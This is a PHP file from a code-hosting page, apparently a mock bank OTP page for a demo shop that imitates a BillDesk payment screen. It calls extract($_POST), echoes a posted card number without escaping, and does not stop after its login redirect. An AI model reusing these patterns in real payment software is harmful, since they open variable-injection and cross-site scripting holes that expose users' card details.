-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbank.php
76 lines (57 loc) · 2.18 KB
/
bank.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<?php
session_start();
if(!isset($_SESSION['client']['status']))
{
header('location:login.php');
}
extract($_POST);
?><!doctype html><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0 minimal-ui"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="apple-mobile-web-app-capable" content="yes"/>
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
<title>BillDesk - All Your Payments. Single Location</title>
<link href="css/css1/bank.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<div id="mainContainer" class="row large-centered">
<div class="text-center"><h2> State Bank Of Africa</h2></div>
<hr class="divider">
<dl class="mercDetails">
<dt>Merchant</dt> <dd>Shop Street</dd>
<dt>Transaction Amount</dt> <dd>INR <?php echo $_SESSION['amount'];?></dd>
<dt>Debit Card</dt> <dd><?php echo $number;?></%></dd>
</dl>
<hr class="divider">
<form name="form1" id="form1" method="post" action="complete_payment.php">
<fieldset class="page2">
<div class="page-heading">
<h6 class="form-heading">Authenticate Payment</h6>
<p class="form-subheading">OTP sent to your mobile number ending <strong>0119</strong></p>
</div>
<div class="row formInputSection">
<div class="large-7 columns">
<label>
Enter One Time Password (OTP)
<input type="tel" name="otp" class="form-control optPass" value="" maxlength="6" autocomplete="off" required/>
</label>
</div>
<div class="large-5 columns">
<label> </label><button class="expanded button next" onClick="ValidateForm()">Make Payment</button>
</div>
</div>
<div class="text-right resendBtn requestOTP"><a class="request-link" href="javascript:void(0)">Resend OTP</a></div>
<p>
<a class="tryAgain" href="process_booking.php">Go back</a> to merchant
</p>
</fieldset>
</form>
</div>
</body>
</html>